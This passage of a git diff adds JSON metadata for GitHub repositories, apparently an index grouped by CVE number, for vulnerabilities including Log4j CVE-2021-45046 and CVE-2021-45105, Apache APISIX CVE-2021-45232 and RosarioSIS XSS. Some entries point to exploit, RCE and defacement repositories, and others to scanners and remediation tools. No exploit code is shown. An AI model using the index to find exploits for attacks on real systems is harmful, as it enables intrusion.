"2021-12-23T10:57:19Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438561965, + "name": "CVE-2021-45046-Info", + "full_name": "BobTheShoplifter\/CVE-2021-45046-Info", + "owner": { + "login": "BobTheShoplifter", + "id": 22559547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22559547?v=4", + "html_url": "https:\/\/github.com\/BobTheShoplifter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BobTheShoplifter\/CVE-2021-45046-Info", + "description": "Oh no another one", + "fork": false, + "created_at": "2021-12-15T09:01:37Z", + "updated_at": "2024-08-12T20:18:55Z", + "pushed_at": "2022-04-07T19:07:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438697866, + "name": "CVE-2021-45046", + "full_name": "tejas-nagchandi\/CVE-2021-45046", + "owner": { + "login": "tejas-nagchandi", + "id": 76960497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76960497?v=4", + "html_url": "https:\/\/github.com\/tejas-nagchandi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tejas-nagchandi\/CVE-2021-45046", + "description": "Replicating CVE-2021-45046", + "fork": false, + "created_at": "2021-12-15T16:28:11Z", + "updated_at": "2021-12-16T07:17:16Z", + "pushed_at": "2021-12-16T07:13:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-45046", + "log4j2" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438746535, + "name": "log4j2-CVE-2021-45046", + "full_name": "pravin-pp\/log4j2-CVE-2021-45046", + "owner": { + "login": "pravin-pp", + "id": 12995541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12995541?v=4", + "html_url": "https:\/\/github.com\/pravin-pp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pravin-pp\/log4j2-CVE-2021-45046", + "description": null, + "fork": false, + "created_at": "2021-12-15T19:19:52Z", + "updated_at": "2021-12-15T19:42:14Z", + "pushed_at": "2021-12-15T19:42:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439085356, + "name": "log4j-samples", + "full_name": "mergebase\/log4j-samples", + "owner": { + "login": "mergebase", + "id": 73667397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73667397?v=4", + "html_url": "https:\/\/github.com\/mergebase", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mergebase\/log4j-samples", + "description": "Public testing data. Samples of log4j library versions to help log4j scanners \/ detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228. TAG_TESTING, OWNER_KEN, DC_PUBLIC", + "fork": false, + "created_at": "2021-12-16T18:12:29Z", + "updated_at": "2023-09-11T19:22:43Z", + "pushed_at": "2021-12-30T05:15:54Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "cve-2021-45046", + "log4j" + ], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 439433330, + "name": "log4jjndilookupremove", + "full_name": "lukepasek\/log4jjndilookupremove", + "owner": { + "login": "lukepasek", + "id": 6756387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6756387?v=4", + "html_url": "https:\/\/github.com\/lukepasek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukepasek\/log4jjndilookupremove", + "description": "A simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.", + "fork": false, + "created_at": "2021-12-17T18:59:16Z", + "updated_at": "2022-01-04T14:24:23Z", + "pushed_at": "2022-01-04T14:24:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439600548, + "name": "cve-2021-45046", + "full_name": "ludy-dev\/cve-2021-45046", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/cve-2021-45046", + "description": null, + "fork": false, + "created_at": "2021-12-18T11:43:56Z", + "updated_at": "2024-04-12T17:17:07Z", + "pushed_at": "2021-12-18T11:53:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440156597, + "name": "log4j2_vul_local_scanner", + "full_name": "lijiejie\/log4j2_vul_local_scanner", + "owner": { + "login": "lijiejie", + "id": 3167953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3167953?v=4", + "html_url": "https:\/\/github.com\/lijiejie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lijiejie\/log4j2_vul_local_scanner", + "description": "Log4j 漏洞本地检测脚本。 Scan all java processes on your host to check whether it's affected by log4j2 remote code execution vulnerability (CVE-2021-45046)", + "fork": false, + "created_at": "2021-12-20T12:07:41Z", + "updated_at": "2024-08-12T20:19:04Z", + "pushed_at": "2021-12-22T06:24:42Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 85, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 441418197, + "name": "Log4Shell-Sandbox-Signature", + "full_name": "CaptanMoss\/Log4Shell-Sandbox-Signature", + "owner": { + "login": "CaptanMoss", + "id": 10811344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10811344?v=4", + "html_url": "https:\/\/github.com\/CaptanMoss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CaptanMoss\/Log4Shell-Sandbox-Signature", + "description": "Log4Shell(CVE-2021-45046) Sandbox Signature", + "fork": false, + "created_at": "2021-12-24T09:02:55Z", + "updated_at": "2021-12-26T19:51:57Z", + "pushed_at": "2021-12-26T19:51:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798066923, + "name": "CyberSecurity_CVE-2021-45046", + "full_name": "shaily29-eng\/CyberSecurity_CVE-2021-45046", + "owner": { + "login": "shaily29-eng", + "id": 59019087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59019087?v=4", + "html_url": "https:\/\/github.com\/shaily29-eng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shaily29-eng\/CyberSecurity_CVE-2021-45046", + "description": null, + "fork": false, + "created_at": "2024-05-09T03:04:17Z", + "updated_at": "2024-05-21T23:30:09Z", + "pushed_at": "2024-05-21T23:30:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45067.json b/2021/CVE-2021-45067.json new file mode 100644 index 0000000000..3b12c571ab --- /dev/null +++ b/2021/CVE-2021-45067.json @@ -0,0 +1,39 @@ +[ + { + "id": 550985084, + "name": "CVE-2021-45067", + "full_name": "hacksysteam\/CVE-2021-45067", + "owner": { + "login": "hacksysteam", + "id": 4098538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4098538?v=4", + "html_url": "https:\/\/github.com\/hacksysteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacksysteam\/CVE-2021-45067", + "description": "Adobe Reader DC Information Leak Exploit ", + "fork": false, + "created_at": "2022-10-13T16:42:10Z", + "updated_at": "2024-09-24T16:59:21Z", + "pushed_at": "2022-10-13T17:00:50Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "adobe-reader", + "aslr-bypass", + "exploit", + "info-leak", + "out-of-bounds" + ], + "visibility": "public", + "forks": 10, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45105.json b/2021/CVE-2021-45105.json new file mode 100644 index 0000000000..86735d3db3 --- /dev/null +++ b/2021/CVE-2021-45105.json @@ -0,0 +1,287 @@ +[ + { + "id": 439614690, + "name": "Log4j_dos_CVE-2021-45105", + "full_name": "cckuailong\/Log4j_dos_CVE-2021-45105", + "owner": { + "login": "cckuailong", + "id": 10824150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4", + "html_url": "https:\/\/github.com\/cckuailong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cckuailong\/Log4j_dos_CVE-2021-45105", + "description": "Log4j_dos_CVE-2021-45105", + "fork": false, + "created_at": "2021-12-18T12:54:44Z", + "updated_at": "2023-01-18T06:57:11Z", + "pushed_at": "2021-12-19T01:59:52Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439635017, + "name": "log4j2-CVE-2021-45105", + "full_name": "pravin-pp\/log4j2-CVE-2021-45105", + "owner": { + "login": "pravin-pp", + "id": 12995541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12995541?v=4", + "html_url": "https:\/\/github.com\/pravin-pp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pravin-pp\/log4j2-CVE-2021-45105", + "description": null, + "fork": false, + "created_at": "2021-12-18T14:24:46Z", + "updated_at": "2021-12-20T02:29:56Z", + "pushed_at": "2021-12-18T14:34:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439989822, + "name": "CVE-2021-45105", + "full_name": "tejas-nagchandi\/CVE-2021-45105", + "owner": { + "login": "tejas-nagchandi", + "id": 76960497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76960497?v=4", + "html_url": "https:\/\/github.com\/tejas-nagchandi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tejas-nagchandi\/CVE-2021-45105", + "description": "Replicating CVE-2021-45105", + "fork": false, + "created_at": "2021-12-19T23:22:25Z", + "updated_at": "2021-12-19T23:50:00Z", + "pushed_at": "2021-12-20T00:49:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-45105", + "log4j2" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440136050, + "name": "log4j2_dos_exploit", + "full_name": "iAmSOScArEd\/log4j2_dos_exploit", + "owner": { + "login": "iAmSOScArEd", + "id": 34957454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34957454?v=4", + "html_url": "https:\/\/github.com\/iAmSOScArEd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iAmSOScArEd\/log4j2_dos_exploit", + "description": "log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc", + "fork": false, + "created_at": "2021-12-20T10:52:20Z", + "updated_at": "2022-08-13T07:08:57Z", + "pushed_at": "2021-12-22T02:37:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 441161290, + "name": "https-github.com-pravin-pp-log4j2-CVE-2021-45105", + "full_name": "dileepdkumar\/https-github.com-pravin-pp-log4j2-CVE-2021-45105", + "owner": { + "login": "dileepdkumar", + "id": 89115244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4", + "html_url": "https:\/\/github.com\/dileepdkumar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dileepdkumar\/https-github.com-pravin-pp-log4j2-CVE-2021-45105", + "description": null, + "fork": false, + "created_at": "2021-12-23T11:38:32Z", + "updated_at": "2021-12-23T11:38:32Z", + "pushed_at": "2021-12-23T11:38:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441161826, + "name": "https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105", + "full_name": "dileepdkumar\/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105", + "owner": { + "login": "dileepdkumar", + "id": 89115244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4", + "html_url": "https:\/\/github.com\/dileepdkumar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dileepdkumar\/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105", + "description": null, + "fork": false, + "created_at": "2021-12-23T11:40:49Z", + "updated_at": "2021-12-23T11:40:49Z", + "pushed_at": "2021-12-23T11:40:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441161964, + "name": "https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v", + "full_name": "dileepdkumar\/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v", + "owner": { + "login": "dileepdkumar", + "id": 89115244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4", + "html_url": "https:\/\/github.com\/dileepdkumar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dileepdkumar\/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v", + "description": null, + "fork": false, + "created_at": "2021-12-23T11:41:25Z", + "updated_at": "2021-12-23T11:41:25Z", + "pushed_at": "2021-12-23T11:41:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441255469, + "name": "https-github.com-pravin-pp-log4j2-CVE-2021-45105-1", + "full_name": "dileepdkumar\/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1", + "owner": { + "login": "dileepdkumar", + "id": 89115244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4", + "html_url": "https:\/\/github.com\/dileepdkumar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dileepdkumar\/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1", + "description": null, + "fork": false, + "created_at": "2021-12-23T17:46:02Z", + "updated_at": "2021-12-23T17:46:14Z", + "pushed_at": "2021-12-23T17:46:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441302422, + "name": "log4j-remediation", + "full_name": "name\/log4j-remediation", + "owner": { + "login": "name", + "id": 39627038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39627038?v=4", + "html_url": "https:\/\/github.com\/name", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/name\/log4j-remediation", + "description": "Discover and remediate Log4Shell vulnerability [CVE-2021-45105]", + "fork": false, + "created_at": "2021-12-23T21:45:42Z", + "updated_at": "2024-07-13T01:15:33Z", + "pushed_at": "2021-12-24T00:56:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "log4j", + "log4j-scanner" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45232.json b/2021/CVE-2021-45232.json new file mode 100644 index 0000000000..58bfde355f --- /dev/null +++ b/2021/CVE-2021-45232.json @@ -0,0 +1,315 @@ +[ + { + "id": 442444055, + "name": "westone-CVE-2021-45232-scanner", + "full_name": "Osyanina\/westone-CVE-2021-45232-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-45232-scanner", + "description": "A vulnerability scanner that detects CVE-2021-45232 vulnerabilities.", + "fork": false, + "created_at": "2021-12-28T11:36:38Z", + "updated_at": "2021-12-28T11:39:20Z", + "pushed_at": "2021-12-28T11:40:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442466781, + "name": "CVE-2021-45232-POC", + "full_name": "badboycxcc\/CVE-2021-45232-POC", + "owner": { + "login": "badboycxcc", + "id": 72059221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4", + "html_url": "https:\/\/github.com\/badboycxcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2021-45232-POC", + "description": null, + "fork": false, + "created_at": "2021-12-28T13:08:34Z", + "updated_at": "2021-12-28T14:37:33Z", + "pushed_at": "2021-12-28T14:37:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442543099, + "name": "CVE-2021-45232", + "full_name": "LTiDi2000\/CVE-2021-45232", + "owner": { + "login": "LTiDi2000", + "id": 68416745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68416745?v=4", + "html_url": "https:\/\/github.com\/LTiDi2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LTiDi2000\/CVE-2021-45232", + "description": null, + "fork": false, + "created_at": "2021-12-28T17:56:59Z", + "updated_at": "2021-12-29T17:51:59Z", + "pushed_at": "2021-12-28T13:30:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 442623106, + "name": "cve-2021-45232", + "full_name": "Ilovewomen\/cve-2021-45232", + "owner": { + "login": "Ilovewomen", + "id": 90023952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90023952?v=4", + "html_url": "https:\/\/github.com\/Ilovewomen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ilovewomen\/cve-2021-45232", + "description": null, + "fork": false, + "created_at": "2021-12-29T01:01:16Z", + "updated_at": "2023-08-04T05:22:51Z", + "pushed_at": "2021-12-29T02:22:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 442640537, + "name": "CVE-2021-45232-RCE", + "full_name": "jxpsx\/CVE-2021-45232-RCE", + "owner": { + "login": "jxpsx", + "id": 41709132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709132?v=4", + "html_url": "https:\/\/github.com\/jxpsx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jxpsx\/CVE-2021-45232-RCE", + "description": "CVE-2021-45232 RCE", + "fork": false, + "created_at": "2021-12-29T02:41:11Z", + "updated_at": "2021-12-29T02:41:12Z", + "pushed_at": "2021-12-28T13:59:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 442695651, + "name": "cve-2021-45232-exp", + "full_name": "wuppp\/cve-2021-45232-exp", + "owner": { + "login": "wuppp", + "id": 16035650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16035650?v=4", + "html_url": "https:\/\/github.com\/wuppp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wuppp\/cve-2021-45232-exp", + "description": null, + "fork": false, + "created_at": "2021-12-29T07:32:30Z", + "updated_at": "2024-10-07T12:01:32Z", + "pushed_at": "2021-12-31T08:30:33Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apisix", + "cve-2021-45232" + ], + "visibility": "public", + "forks": 31, + "watchers": 78, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 442931709, + "name": "CVE-2021-45232", + "full_name": "dskho\/CVE-2021-45232", + "owner": { + "login": "dskho", + "id": 32945923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32945923?v=4", + "html_url": "https:\/\/github.com\/dskho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dskho\/CVE-2021-45232", + "description": "CVE-2021-45232 POC", + "fork": false, + "created_at": "2021-12-30T01:14:40Z", + "updated_at": "2022-09-01T02:03:06Z", + "pushed_at": "2021-12-29T05:51:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 444659919, + "name": "CVE-2021-45232-RCE", + "full_name": "GYLQ\/CVE-2021-45232-RCE", + "owner": { + "login": "GYLQ", + "id": 15842234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15842234?v=4", + "html_url": "https:\/\/github.com\/GYLQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GYLQ\/CVE-2021-45232-RCE", + "description": "CVE-2021-45232-RCE-多线程批量漏洞检测", + "fork": false, + "created_at": "2022-01-05T04:13:10Z", + "updated_at": "2024-11-06T23:16:26Z", + "pushed_at": "2022-01-13T05:12:49Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 34, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 444735399, + "name": "CVE-2021-45232-RCE", + "full_name": "fany0r\/CVE-2021-45232-RCE", + "owner": { + "login": "fany0r", + "id": 29101894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29101894?v=4", + "html_url": "https:\/\/github.com\/fany0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fany0r\/CVE-2021-45232-RCE", + "description": "CVE-2021-45232-RCE", + "fork": false, + "created_at": "2022-01-05T09:07:35Z", + "updated_at": "2024-11-18T23:14:29Z", + "pushed_at": "2023-06-24T08:52:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 490272524, + "name": "Apisix_Crack", + "full_name": "YutuSec\/Apisix_Crack", + "owner": { + "login": "YutuSec", + "id": 41934714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41934714?v=4", + "html_url": "https:\/\/github.com\/YutuSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YutuSec\/Apisix_Crack", + "description": "Apisix系列漏洞:未授权漏洞(CVE-2021-45232)、默认秘钥(CVE-2020-13945)批量探测。", + "fork": false, + "created_at": "2022-05-09T12:26:11Z", + "updated_at": "2024-02-25T02:01:05Z", + "pushed_at": "2022-05-09T12:32:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45416.json b/2021/CVE-2021-45416.json new file mode 100644 index 0000000000..c3ea512cc1 --- /dev/null +++ b/2021/CVE-2021-45416.json @@ -0,0 +1,64 @@ +[ + { + "id": 452799854, + "name": "CVE-2021-45416", + "full_name": "86x\/CVE-2021-45416", + "owner": { + "login": "86x", + "id": 75100597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75100597?v=4", + "html_url": "https:\/\/github.com\/86x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/86x\/CVE-2021-45416", + "description": "Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules\/Scheduling\/Courses.php script.", + "fork": false, + "created_at": "2022-01-27T18:34:00Z", + "updated_at": "2023-06-12T07:19:17Z", + "pushed_at": "2022-02-01T16:07:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 459058671, + "name": "CVE-2021-45416", + "full_name": "dnr6419\/CVE-2021-45416", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-45416", + "description": "Stored XSS Vulnerability on RosarioSIS 8.2.1", + "fork": false, + "created_at": "2022-02-14T07:31:01Z", + "updated_at": "2022-02-14T07:34:41Z", + "pushed_at": "2022-02-16T08:03:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45428.json b/2021/CVE-2021-45428.json new file mode 100644 index 0000000000..925d3a0d0f --- /dev/null +++ b/2021/CVE-2021-45428.json @@ -0,0 +1,33 @@ +[ + { + "id": 835106920, + "name": "CVE-2021-45428-Defacer", + "full_name": "projectforsix\/CVE-2021-45428-Defacer", + "owner": { + "login": "projectforsix", + "id": 141679432, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141679432?v=4", + "html_url": "https:\/\/github.com\/projectforsix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/projectforsix\/CVE-2021-45428-Defacer", + "description": null, + "fork": false, + "created_at": "2024-07-29T07:11:06Z", + "updated_at": "2024-07-30T05:31:37Z", + "pushed_at": "2024-07-30T05:31:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45468.json 